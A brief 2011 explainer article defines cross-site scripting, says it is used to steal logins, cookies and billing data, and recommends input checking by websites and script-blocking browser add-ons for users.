What is Cross-Site Scripting?


Cross-site scripting (XSS) is a method of injecting web code into a web site or HTML-formatted email in order to gain access to user data.

How Cross-Site Scripting works

The goal with XSS is to obtain user information associated with the web site, such as their username and password, and any additional information such as billing information. XSS is also used for cookie stealing, changing of user settings and account hijacking.

It works by relying on a web site having a XSS-vunerability, or by a user clicking on a link on another web site or in an email while logged in to a particular web site such as Facebook.

Web sites that offer a way for visitors to enter data should be checking that what is being entered is just text and not code (this is known as code injection).

As a basic example, a web site that lets you enter text to be posted on the site's web pages should be checking that what you entered is just text and not web code, otherwise the web pages being generated could be making public or distributing your information to a third party.

XSS has been around for many years and has grown to encompass attacks using all sorts of web page objects such as Flash, Java, Javascript, VBScript and ActiveX.

Last word

Web sites that offer their visitors the ability to input data that then forms part of a web page that is made public - such as a web forum - should be checking that what is being entered is not web code.

A cross-site script in its simplest form is code injected into a web site for the purpose of allowing a third party to access or interact with another persons web session.

To defend against XSS add scripting-controls to your web browser, such as NoScript for Firefox.

If you have any feedback regarding this article, or you have a suggestion for a new article, or just want to say thanks for the info then feel free to drop me an email at

Article date: 25th February 2011

Click here for more articles